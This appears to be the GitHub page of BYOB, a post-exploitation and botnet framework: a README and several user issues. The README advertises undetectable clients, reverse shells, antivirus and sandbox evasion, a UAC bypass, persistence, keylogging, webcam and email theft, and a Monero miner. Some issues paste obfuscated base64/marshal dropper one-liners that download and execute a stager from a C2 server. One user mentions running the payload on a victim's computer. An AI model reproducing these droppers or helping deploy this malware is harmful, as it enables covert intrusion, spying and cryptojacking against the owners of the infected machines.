An open-source post-exploitation framework for students, researchers and developers.

Overview

Banner

license version build Coverage Status Discord Tweet

Questions? Join the Discord support server

Disclaimer: This project should be used for authorized testing or educational purposes only.

BYOB is an open-source post-exploitation framework for students, researchers and developers. It includes features such as:

  • Command & control server with intuitive user-interface
  • Custom payload generator for multiple platforms
  • 12 post-exploitation modules

It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch.

This project has 2 main parts: the original console-based application (/byob) and the web GUI (/web-gui).

Web GUI

Dashboard

A control panel for your C2 server with a point-and-click interface for executing post-exploitation modules. The control panel includes an interactive map of client machines and a dashboard which allows efficient, intuitive administration of client machines.

dashboard_preview

Payload Generator

The payload generator uses black magic involving Docker containers & Wine servers to compile executable payloads for any platform/architecture you select. These payloads spawn reverse TCP shells with communication over the network encrypted via AES-256 after generating a secure symmetric key using the Diffie-Hellman IKE.

payloads_preview

Terminal Emulator

The web app includes an in-browser terminal emulator so you can still have direct shell access even when using the web GUI.

terminal_preview

Console Application

Client

client

Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules

  1. Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
  2. Nothing Written To The Disk: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process
  3. Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host
  4. Add New Features With Just 1 Click: any python script, module, or package you copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running
  5. Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process
  6. Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size
  7. Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed
  8. Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS)
  9. Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections
  10. Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning
  11. Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it
  12. Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected

Modules

modules

Post-exploitation modules that are remotely importable by clients

  1. Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods
  2. Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file
  3. Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges
  4. Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports
  5. Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered
  6. Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop
  7. Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam
  8. Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client
  9. Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host
  10. iCloud (byob.modules.icloud): check for logged in iCloud account on macOS
  11. Miner (byob.core.miner): mine Monero in the background using the built-in miner or XMRig

Server

server

Command & control server with persistent database and console

  1. Console-Based User-Interface: streamlined console interface for controlling client host machines remotely via reverse TCP shells which provide direct terminal access to the client host machines
  2. Persistent SQLite Database: lightweight database that stores identifying information about client host machines, allowing reverse TCP shell sessions to persist through disconnections of arbitrary duration and enabling long-term reconnaissance
  3. Client-Server Architecture: all python packages/modules installed locally are automatically made available for clients to remotely import without writing them to the disk of the target machines, allowing clients to use modules which require packages not installed on the target machines

Core

core

Core framework modules used by the generator and the server

  1. Utilities (byob.core.util): miscellaneous utility functions that are used by many modules
  2. Security (byob.core.security): Diffie-Hellman IKE & 3 encryption modes (AES-256-OCB, AES-256-CBC, XOR-128)
  3. Loaders (byob.core.loaders): remotely import any package/module/scripts from the server
  4. Payloads (byob.core.payloads): reverse TCP shell designed to remotely import dependencies, packages & modules
  5. Stagers (byob.core.stagers): generate unique payload stagers to prevent analysis & detection
  6. Generators (byob.core.generators): functions which all dynamically generate code for the client generator
  7. DAO (byob.core.dao): handles interaction between command & control server and the SQLite database
  8. Handler (byob.core.handler): HTTP POST request handler for remote file uploads to the server

To Do

Contributors welcome! Feel free to issue pull-requests with any new features or improvements you have come up with!

  1. Remote Import Encryption - encryption for data streams of packages/modules being remotely imported (to maintain confidentiality/authenticity/integrity and prevent any remote code execution vulnerabilities arising from deserialization)
  2. Transport Types - add support for more transport types (HTTP/S, DNS, etc.)
  3. Bug Fixes - fix any bugs/issues
Comments
  • Connection refused error, edit3: ngrok connection?

    Connection refused error, edit3: ngrok connection?

    Traceback (most recent call last): File "urllib/request.py", line 1317, in do_open File "http/client.py", line 1252, in request File "http/client.py", line 1298, in _send_request File "http/client.py", line 1247, in endheaders File "http/client.py", line 1026, in _send_output File "http/client.py", line 966, in send File "http/client.py", line 938, in connect File "socket.py", line 727, in create_connection File "socket.py", line 716, in create_connection ConnectionRefusedError: [Errno 111] Connection refused

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "byob_nix_amd64_a5A.py", line 5, in File "", line 1, in File "urllib/request.py", line 222, in urlopen File "urllib/request.py", line 525, in open File "urllib/request.py", line 543, in _open File "urllib/request.py", line 503, in _call_chain File "urllib/request.py", line 1345, in http_open File "urllib/request.py", line 1319, in do_open urllib.error.URLError: <urlopen error [Errno 111] Connection refused> [14900] Failed to execute script byob_nix_amd64_a5A

    The payload is not on my OWN and not on my VICTIMS computer running. I tried Linux executable (first it cant create linux executable, later worked) and Python on Windows 10 and Ubuntu20.04. No error message in output from Server. Need I to allow a special port? ssh is working with 0.0.0.0:22 and 127.0.0.1:22.

    File "socket.py", line 727, in create_connection File "socket.py", line 716, in create_connection ConnectionRefusedError: [Errno 111] Connection refused I think here was the "Bug" from the Script. Or have I to edit the script?

    import sys,zlib,base64,marshal,json,urllib if sys.version_info[0] > 2: from urllib import request urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen #Here is maybe the error exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWRgYCgtyskvSM3TUM8oKSmw0tc3NtQzNNAzNDXWM7AyNDa20NcvLklMTy0q1i/3dtErqFTX1CtKTUzR0AQAHWIRig==')))))

    Please help me. I saw many closed issues with this error. Maybe I forgot to install something on the Server.

    no-issue-activity 
    opened by arch-user-france1 113
  • Failed to execute script pyiboot01_bootstrap

    Failed to execute script pyiboot01_bootstrap

    Getting the error: Failed to execute script pyiboot01_bootstrap on the payload (.exe file).

    128 INFO: PyInstaller: 4.0.dev0+9dd34bdfba 128 INFO: Python: 3.7.2 128 INFO: Platform: Windows-10-10.0.18362-SP0

    Any workaround for this for now ? Thank you

    EDIT: Tried using Python 2.7 too, same error.

    opened by glinskicwb1988 67
  • Connection refused.

    Connection refused.

    Traceback (most recent call last): File "byob_z7N.py", line 5, in exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWRgYCgtyskvSM3TUM8oKSmw0tc3MtEz1DO0NNOzsLAyNDa20NcvLklMTy0q1q8y99MrqFTX1CtKTUzR0AQAIDcRnA=='))))) File "", line 1, in File "/usr/lib/python2.7/urllib.py", line 87, in urlopen return opener.open(url) File "/usr/lib/python2.7/urllib.py", line 215, in open return getattr(self, name)(url) File "/usr/lib/python2.7/urllib.py", line 352, in open_http h.endheaders(data) File "/usr/lib/python2.7/httplib.py", line 1078, in endheaders self._send_output(message_body) File "/usr/lib/python2.7/httplib.py", line 894, in _send_output self.send(msg) File "/usr/lib/python2.7/httplib.py", line 856, in send self.connect() File "/usr/lib/python2.7/httplib.py", line 833, in connect self.timeout, self.source_address) File "/usr/lib/python2.7/socket.py", line 575, in create_connection raise err IOError: [Errno socket error] [Errno 111] Connection refused

    opened by xxlimit 61
  • I cannot create an executable windows x32 or linux amd64 etc.

    I cannot create an executable windows x32 or linux amd64 etc.

    I'm using web-gui and can't create executable for windows and linux but I can with Python easily this what appears in the console when i try to make one byob

    opened by MiChaelinzo 35
  •   Install is stuck on

    Install is stuck on "Running setup.py bdist_wheel for opencv-python"

    Install is stuck on "Running setup.py bdist_wheel for opencv-python" It has been like this for 2 hours now, none of the other packages before took this long.

    no-issue-activity 
    opened by pashfido 29
  • Cannot install on Ubuntu or Kali

    Cannot install on Ubuntu or Kali

    Errors from installation:

    unning BYOB app startup... Confirmed Python is installed. Installing Docker... Reading package lists... Done Building dependency tree
    Reading state information... Done The following additional packages will be installed: bridge-utils cgroupfs-mount containerd pigz runc ubuntu-fan Suggested packages: ifupdown aufs-tools btrfs-progs debootstrap docker-doc rinse zfs-fuse | zfsutils The following NEW packages will be installed: bridge-utils cgroupfs-mount containerd docker.io pigz runc ubuntu-fan 0 upgraded, 7 newly installed, 0 to remove and 26 not upgraded. Need to get 69.3 MB of archives. After this operation, 333 MB of additional disk space will be used. Get:1 http://us.archive.ubuntu.com/ubuntu focal/universe amd64 pigz amd64 2.4-1 [57.4 kB] Get:2 http://us.archive.ubuntu.com/ubuntu focal/main amd64 bridge-utils amd64 1.6-2ubuntu1 [30.5 kB] Get:3 http://us.archive.ubuntu.com/ubuntu focal/universe amd64 cgroupfs-mount all 1.4 [6,320 B] Get:4 http://us.archive.ubuntu.com/ubuntu focal/main amd64 runc amd64 1.0.0~rc10-0ubuntu1 [2,549 kB] Get:5 http://us.archive.ubuntu.com/ubuntu focal/main amd64 containerd amd64 1.3.3-0ubuntu2 [27.8 MB]
    Get:6 http://us.archive.ubuntu.com/ubuntu focal/universe amd64 docker.io amd64 19.03.8-0ubuntu1 [38.9 MB]
    Get:7 http://us.archive.ubuntu.com/ubuntu focal/main amd64 ubuntu-fan all 0.12.13 [34.5 kB]
    Fetched 69.3 MB in 7min 39s (151 kB/s)
    Preconfiguring packages ... Selecting previously unselected package pigz. (Reading database ... 186693 files and directories currently installed.) Preparing to unpack .../0-pigz_2.4-1_amd64.deb ... Unpacking pigz (2.4-1) ... Selecting previously unselected package bridge-utils. Preparing to unpack .../1-bridge-utils_1.6-2ubuntu1_amd64.deb ... Unpacking bridge-utils (1.6-2ubuntu1) ... Selecting previously unselected package cgroupfs-mount. Preparing to unpack .../2-cgroupfs-mount_1.4_all.deb ... Unpacking cgroupfs-mount (1.4) ... Selecting previously unselected package runc. Preparing to unpack .../3-runc_1.0.0~rc10-0ubuntu1_amd64.deb ... Unpacking runc (1.0.0~rc10-0ubuntu1) ... Selecting previously unselected package containerd. Preparing to unpack .../4-containerd_1.3.3-0ubuntu2_amd64.deb ... Unpacking containerd (1.3.3-0ubuntu2) ... Selecting previously unselected package docker.io. Preparing to unpack .../5-docker.io_19.03.8-0ubuntu1_amd64.deb ... Unpacking docker.io (19.03.8-0ubuntu1) ... Selecting previously unselected package ubuntu-fan. Preparing to unpack .../6-ubuntu-fan_0.12.13_all.deb ... Unpacking ubuntu-fan (0.12.13) ... Setting up runc (1.0.0~rc10-0ubuntu1) ... Setting up bridge-utils (1.6-2ubuntu1) ... Setting up pigz (2.4-1) ... Setting up cgroupfs-mount (1.4) ... Setting up containerd (1.3.3-0ubuntu2) ... Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service. Setting up ubuntu-fan (0.12.13) ... Created symlink /etc/systemd/system/multi-user.target.wants/ubuntu-fan.service → /lib/systemd/system/ubuntu-fan.service. Setting up docker.io (19.03.8-0ubuntu1) ... Adding group `docker' (GID 133) ... Done. Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket. docker.service is a disabled or a static unit, not starting it. Processing triggers for systemd (245.4-4ubuntu3.1) ... Processing triggers for man-db (2.9.1-1) ... Installing Python packages... Ignoring pypiwin32: markers 'sys_platform == "win32"' don't match your environment Ignoring pyHook: markers 'sys_platform == "win32"' don't match your environment Collecting flask Downloading Flask-1.1.2-py2.py3-none-any.whl (94 kB) |████████████████████████████████| 94 kB 199 kB/s Collecting flask_session Downloading Flask_Session-0.3.2-py2.py3-none-any.whl (7.4 kB) Collecting flask_wtf Downloading Flask_WTF-0.14.3-py2.py3-none-any.whl (13 kB) Collecting Flask_SQLAlchemy Downloading Flask_SQLAlchemy-2.4.3-py2.py3-none-any.whl (17 kB) Collecting Flask_Login Downloading Flask_Login-0.5.0-py2.py3-none-any.whl (16 kB) Collecting Flask_Bcrypt Downloading Flask-Bcrypt-0.7.1.tar.gz (5.1 kB) Collecting flask_mail Downloading Flask-Mail-0.9.1.tar.gz (45 kB) |████████████████████████████████| 45 kB 1.6 MB/s Collecting wtforms Downloading WTForms-2.3.1-py2.py3-none-any.whl (169 kB) |████████████████████████████████| 169 kB 2.1 MB/s Collecting mss==3.3.0 Downloading mss-3.3.0-py2.py3-none-any.whl (19 kB) Collecting WMI==1.4.9 Downloading WMI-1.4.9.zip (26 kB) Collecting numpy==1.15.2 Downloading numpy-1.15.2.zip (4.5 MB) |████████████████████████████████| 4.5 MB 1.6 MB/s Collecting pyxhook==1.0.0 Downloading pyxhook-1.0.0.tar.gz (4.3 kB) Downloading pyxhook-1.0.0.tar.gz (4.3 kB) Collecting twilio==6.14.0 Downloading twilio-6.14.0-py2.py3-none-any.whl (821 kB) |████████████████████████████████| 821 kB 3.6 MB/s Collecting colorama==0.3.9 Downloading colorama-0.3.9-py2.py3-none-any.whl (20 kB) Collecting requests==2.20.0 Downloading requests-2.20.0-py2.py3-none-any.whl (60 kB) |████████████████████████████████| 60 kB 3.3 MB/s Collecting pycryptodomex==3.8.1 Downloading pycryptodomex-3.8.1.tar.gz (11.5 MB) |████████████████████████████████| 11.5 MB 7.6 MB/s Collecting py-cryptonight>=0.2.4 Downloading py_cryptonight-0.3.2.tar.gz (352 kB) |████████████████████████████████| 352 kB 1.1 MB/s Collecting pyrx Cloning https://github.com/jtgrassie/pyrx.git to /tmp/pip-install-yqvp3a/pyrx Running command git clone -q https://github.com/jtgrassie/pyrx.git /tmp/pip-install-yqvp3a/pyrx Running command git submodule update --init --recursive -q Collecting opencv-python Downloading opencv_python-4.2.0.34-cp38-cp38-manylinux1_x86_64.whl (28.2 MB) |████████████████████████████████| 28.2 MB 246 kB/s Collecting Werkzeug>=0.15 Downloading Werkzeug-1.0.1-py2.py3-none-any.whl (298 kB) |████████████████████████████████| 298 kB 5.2 MB/s Collecting itsdangerous>=0.24 Downloading itsdangerous-1.1.0-py2.py3-none-any.whl (16 kB) Collecting click>=5.1 Downloading click-7.1.2-py2.py3-none-any.whl (82 kB) |████████████████████████████████| 82 kB 446 kB/s Collecting Jinja2>=2.10.1 Downloading Jinja2-2.11.2-py2.py3-none-any.whl (125 kB) |████████████████████████████████| 125 kB 1.2 MB/s Collecting cachelib Downloading cachelib-0.1-py3-none-any.whl (12 kB) Collecting SQLAlchemy>=0.8.0 Downloading SQLAlchemy-1.3.17-cp38-cp38-manylinux2010_x86_64.whl (1.3 MB) |████████████████████████████████| 1.3 MB 2.4 MB/s Requirement already satisfied: bcrypt in /usr/lib/python3/dist-packages (from Flask_Bcrypt->-r requirements.txt (line 6)) (3.1.7) Requirement already satisfied: blinker in /usr/lib/python3/dist-packages (from flask_mail->-r requirements.txt (line 7)) (1.4) Requirement already satisfied: MarkupSafe in /usr/lib/python3/dist-packages (from wtforms->-r requirements.txt (line 8)) (1.1.0) Collecting python-xlib Downloading python_xlib-0.27-py2.py3-none-any.whl (174 kB) |████████████████████████████████| 174 kB 840 kB/s Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from twilio==6.14.0->-r requirements.txt (line 13)) (2019.3) Requirement already satisfied: six in /usr/lib/python3/dist-packages (from twilio==6.14.0->-r requirements.txt (line 13)) (1.14.0) Collecting pysocks; python_version >= "3.0" Downloading PySocks-1.7.1-py3-none-any.whl (16 kB) Requirement already satisfied: PyJWT>=1.4.2 in /usr/lib/python3/dist-packages (from twilio==6.14.0->-r requirements.txt (line 13)) (1.7.1) Requirement already satisfied: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests==2.20.0->-r requirements.txt (line 15)) (2019.11.28) Collecting idna<2.8,>=2.5 Downloading idna-2.7-py2.py3-none-any.whl (58 kB) |████████████████████████████████| 58 kB 288 kB/s Requirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/lib/python3/dist-packages (from requests==2.20.0->-r requirements.txt (line 15)) (3.0.4) Collecting urllib3<1.25,>=1.21.1 Downloading urllib3-1.24.3-py2.py3-none-any.whl (118 kB) |████████████████████████████████| 118 kB 3.5 MB/s Building wheels for collected packages: Flask-Bcrypt, flask-mail, WMI, numpy, pyxhook, pycryptodomex, py-cryptonight, pyrx Building wheel for Flask-Bcrypt (setup.py) ... done Created wheel for Flask-Bcrypt: filename=Flask_Bcrypt-0.7.1-py3-none-any.whl size=5010 sha256=cabd532a182cd06e0633c4e5c44237fa26bce54408e6f42207a78783ffe9ed7e Stored in directory: /root/.cache/pip/wheels/8a/d9/0e/dc762c4ebc76f581397a2e25991db6efd148640b5616ab9210 Building wheel for flask-mail (setup.py) ... done Created wheel for flask-mail: filename=Flask_Mail-0.9.1-py3-none-any.whl size=7568 sha256=1f50c3f59f3800b7310a031db5004ea3901f21230a3235a5860459eb577b662d Stored in directory: /root/.cache/pip/wheels/98/bc/8c/34c329e4d7efeaf7b9886db0c76d0b23170e54de443f688e3c Building wheel for WMI (setup.py) ... done Created wheel for WMI: filename=WMI-1.4.9-py3-none-any.whl size=27284 sha256=a9cb80ca4022e31eaf15b94c06beefc733b41e72aed1bd85625a8cd215d4dcb8 Stored in directory: /root/.cache/pip/wheels/02/bc/50/8a2e3fe0f3cc01b0936ffc895a4674cf2a913fb592e15587c2 Building wheel for numpy (setup.py) ... done Created wheel for numpy: filename=numpy-1.15.2-cp38-cp38-linux_x86_64.whl size=13667914 sha256=f76f7025d930ac4f252afc986a308460cc93cbc7403df0aa737e67a462f73013 Stored in directory: /root/.cache/pip/wheels/1a/3e/21/18e41365c30013ab2440919972a489bbd68d44ed16772cbf39 Building wheel for pyxhook (setup.py) ... done Created wheel for pyxhook: filename=pyxhook-1.0.0-py3-none-any.whl size=4754 sha256=e20f9969d7fe762a7d8f1b35151642c6d042e1cb576143bb3dd9694a4f262bc9 Stored in directory: /root/.cache/pip/wheels/9b/2d/b5/f207c6240de6a02937a430250e641975293d1e14b858d11280 Building wheel for pycryptodomex (setup.py) ... done Created wheel for pycryptodomex: filename=pycryptodomex-3.8.1-cp38-cp38-linux_x86_64.whl size=9735245 sha256=91b2045c171cb43b9558c6d0042eab4f6b0562ad7795644e5fe66ca985fa5206 Stored in directory: /root/.cache/pip/wheels/39/be/27/d91b06e155d053d94b34924334ced91ac0cd0e3067580358bb Building wheel for py-cryptonight (setup.py) ... done Created wheel for py-cryptonight: filename=py_cryptonight-0.3.2-cp38-cp38-linux_x86_64.whl size=434693 sha256=37e761b2187012596da5b6603cbb5ec066a7a6aef24d3d167966ca351853b9c8 Stored in directory: /root/.cache/pip/wheels/14/f8/06/9f12b2526839d9beda638696d2fd69757d13ebce1674218706 Building wheel for pyrx (setup.py) ... error ERROR: Command errored out with exit status 1: command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-yqvp3a/pyrx/setup.py'"'"'; file='"'"'/tmp/pip-install-yqvp3a/pyrx/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' bdist_wheel -d /tmp/pip-wheel-ca1setqe cwd: /tmp/pip-install-yqvp3a/pyrx/ Complete output (45 lines): running bdist_wheel running build running build_ext Traceback (most recent call last): File "/tmp/pip-install-yqvp3a/pyrx/setup.py", line 21, in run out = subprocess.check_output(['cmake', '--version']) File "/usr/lib/python3.8/subprocess.py", line 411, in check_output return run(*popenargs, stdout=PIPE, timeout=timeout, check=True, File "/usr/lib/python3.8/subprocess.py", line 489, in run with Popen(*popenargs, **kwargs) as process: File "/usr/lib/python3.8/subprocess.py", line 854, in init self._execute_child(args, executable, preexec_fn, close_fds, File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child raise child_exception_type(errno_num, err_msg, err_filename) FileNotFoundError: [Errno 2] No such file or directory: 'cmake'

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "", line 1, in File "/tmp/pip-install-yqvp3a/pyrx/setup.py", line 59, in setup( File "/usr/lib/python3/dist-packages/setuptools/init.py", line 144, in setup return distutils.core.setup(**attrs) File "/usr/lib/python3.8/distutils/core.py", line 148, in setup dist.run_commands() File "/usr/lib/python3.8/distutils/dist.py", line 966, in run_commands self.run_command(cmd) File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command cmd_obj.run() File "/usr/lib/python3/dist-packages/wheel/bdist_wheel.py", line 223, in run self.run_command('build') File "/usr/lib/python3.8/distutils/cmd.py", line 313, in run_command self.distribution.run_command(command) File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command cmd_obj.run() File "/usr/lib/python3.8/distutils/command/build.py", line 135, in run self.run_command(cmd_name) File "/usr/lib/python3.8/distutils/cmd.py", line 313, in run_command self.distribution.run_command(command) File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command cmd_obj.run() File "/tmp/pip-install-yqvp3a/pyrx/setup.py", line 23, in run raise RuntimeError("CMake must be installed to build the following extensions: " + RuntimeError: CMake must be installed to build the following extensions: pyrx

    ERROR: Failed building wheel for pyrx Running setup.py clean for pyrx Successfully built Flask-Bcrypt flask-mail WMI numpy pyxhook pycryptodomex py-cryptonight Failed to build pyrx ERROR: opencv-python 4.2.0.34 has requirement numpy>=1.17.3, but you'll have numpy 1.15.2 which is incompatible. Installing collected packages: Werkzeug, itsdangerous, click, Jinja2, flask, cachelib, flask-session, wtforms, flask-wtf, SQLAlchemy, Flask-SQLAlchemy, Flask-Login, Flask-Bcrypt, flask-mail, mss, WMI, numpy, python-xlib, pyxhook, idna, urllib3, requests, pysocks, twilio, colorama, pycryptodomex, py-cryptonight, pyrx, opencv-python Attempting uninstall: idna Found existing installation: idna 2.8 Not uninstalling idna at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'idna'. No files were found to uninstall. Attempting uninstall: urllib3 Found existing installation: urllib3 1.25.8 Not uninstalling urllib3 at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'urllib3'. No files were found to uninstall. Attempting uninstall: requests Found existing installation: requests 2.22.0 Not uninstalling requests at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'requests'. No files were found to uninstall. Running setup.py install for pyrx ... error ERROR: Command errored out with exit status 1: command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-yqvp3a/pyrx/setup.py'"'"'; file='"'"'/tmp/pip-install-yqvp3a/pyrx/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' install --record /tmp/pip-record-hnewopso/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/pyrx cwd: /tmp/pip-install-yqvp3a/pyrx/ Complete output (47 lines): running install running build running build_ext Traceback (most recent call last): File "/tmp/pip-install-yqvp3a/pyrx/setup.py", line 21, in run out = subprocess.check_output(['cmake', '--version']) File "/usr/lib/python3.8/subprocess.py", line 411, in check_output return run(*popenargs, stdout=PIPE, timeout=timeout, check=True, File "/usr/lib/python3.8/subprocess.py", line 489, in run with Popen(*popenargs, **kwargs) as process: File "/usr/lib/python3.8/subprocess.py", line 854, in init self._execute_child(args, executable, preexec_fn, close_fds, File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child raise child_exception_type(errno_num, err_msg, err_filename) FileNotFoundError: [Errno 2] No such file or directory: 'cmake'

    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-install-_yqvp3a_/pyrx/setup.py", line 59, in <module>
        setup(
      File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 144, in setup
        return distutils.core.setup(**attrs)
      File "/usr/lib/python3.8/distutils/core.py", line 148, in setup
        dist.run_commands()
      File "/usr/lib/python3.8/distutils/dist.py", line 966, in run_commands
        self.run_command(cmd)
      File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command
        cmd_obj.run()
      File "/usr/lib/python3/dist-packages/setuptools/command/install.py", line 61, in run
        return orig.install.run(self)
      File "/usr/lib/python3.8/distutils/command/install.py", line 589, in run
        self.run_command('build')
      File "/usr/lib/python3.8/distutils/cmd.py", line 313, in run_command
        self.distribution.run_command(command)
      File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command
        cmd_obj.run()
      File "/usr/lib/python3.8/distutils/command/build.py", line 135, in run
        self.run_command(cmd_name)
      File "/usr/lib/python3.8/distutils/cmd.py", line 313, in run_command
        self.distribution.run_command(command)
      File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command
        cmd_obj.run()
      File "/tmp/pip-install-_yqvp3a_/pyrx/setup.py", line 23, in run
        raise RuntimeError("CMake must be installed to build the following extensions: " +
    RuntimeError: CMake must be installed to build the following extensions: pyrx
    ----------------------------------------
    

    ERROR: Command errored out with exit status 1: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-yqvp3a/pyrx/setup.py'"'"'; file='"'"'/tmp/pip-install-yqvp3a/pyrx/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' install --record /tmp/pip-record-hnewopso/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/pyrx Check the logs for full command output. Building Docker images - this will take a while, please be patient... unable to prepare context: unable to evaluate symlinks in Dockerfile path: lstat /home/alex/byob/web-gui/docker-pyinstaller/Dockerfile-py3-amd64: no such file or directory unable to prepare context: unable to evaluate symlinks in Dockerfile path: lstat /home/alex/byob/web-gui/docker-pyinstaller/Dockerfile-py3-i386: no such file or directory unable to prepare context: unable to evaluate symlinks in Dockerfile path: lstat /home/alex/byob/web-gui/docker-pyinstaller/Dockerfile-py3-win32: no such file or directory Running C2 server with locally hosted web app GUI... Navigate to http://127.0.0.1:5000 and set up your user to get started. Serving Python packages from /usr/local/lib/python3.8/dist-packages on port 1339... Serving BYOB modules from /home/alex/byob/web-gui/buildyourownbotnet/modules on port 1338... _init_dev_miner error: No module named 'pyrx' _init_dev_miner error: 'C2' object has no attribute 'execute'

    • Serving Flask app "buildyourownbotnet" (lazy loading)
    • Environment: production WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
    • Debug mode: off INFO:werkzeug: * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
    bug no-issue-activity 
    opened by alexp121 19
  • Client issue

    Client issue

    Raspberry PI 2B - Linux kali 4.1.12-v7 #87 SMP PREEMPT Tue Jan 5 20:59:45 CST 2016 armv7l GNU/Linux

    `# python ./client.py --name byob02cl 192.168.1.8 8186

    [>] Modules Adding modules... - (3 modules added to client)

    [>]Imports Adding imports...- (26 imports from 3 modules)

    [>] Payload Uploading payload... (hosting payload at: http://192.168.1.8:8187//payloads/w4t.py) [>] Stager Uploading stager... -(hosting stager at: http://192.168.1.8:8187//stagers/w4t.py)

    [>] Dropper Writing dropper... (203 bytes written to byob02cl.py)`

    # python ./server.py --host 192.168.1.8 --port **8187**

    Windows 7 - 32bit Intel CPU dual core [email protected] 1.60GHz

    CMD - Tried with and without admin rights. Same result.

    `>

    python byob02cl.py

    ` Nothing happens in both, Client seem to be stuck and from server-side there are no clients. But when I shut down the server, the client responds like this:

    System32 CMD: `>python byob02cl.py Traceback (most recent call last): File "byob02cl.py", line 1, in import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmBgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6FlYWhhbm+vrFJYnpqUXF+uUmJXoFleqaekWpiSkamgDPlRR/'))))) TypeError: expected string without null bytes

    `

    CMD: `>python byob02cl.py Traceback (most recent call last): File "byob02cl.py", line 1, in import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmBgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6FlYWhhbm+vrFJYnpqUXF+uUmJXoFleqaekWpiSkamgDPlRR/'))))) File "", line 1, in File "C:\Python27\lib\urllib.py", line 87, in urlopen return opener.open(url) File "C:\Python27\lib\urllib.py", line 213, in open return getattr(self, name)(url) File "C:\Python27\lib\urllib.py", line 351, in open_http errcode, errmsg, headers = h.getreply() File "C:\Python27\lib\httplib.py", line 1196, in getreply response = self._conn.getresponse() File "C:\Python27\lib\httplib.py", line 1121, in getresponse response.begin() File "C:\Python27\lib\httplib.py", line 438, in begin version, status, reason = self._read_status() File "C:\Python27\lib\httplib.py", line 394, in _read_status line = self.fp.readline(_MAXLINE + 1) File "C:\Python27\lib\socket.py", line 480, in readline data = self._sock.recv(self._rbufsize) IOError: [Errno socket error] [Errno 10054] Connection interrupted by the remote host

    `

    So, it's clear that the client can see the server, but the server is not listing any client.

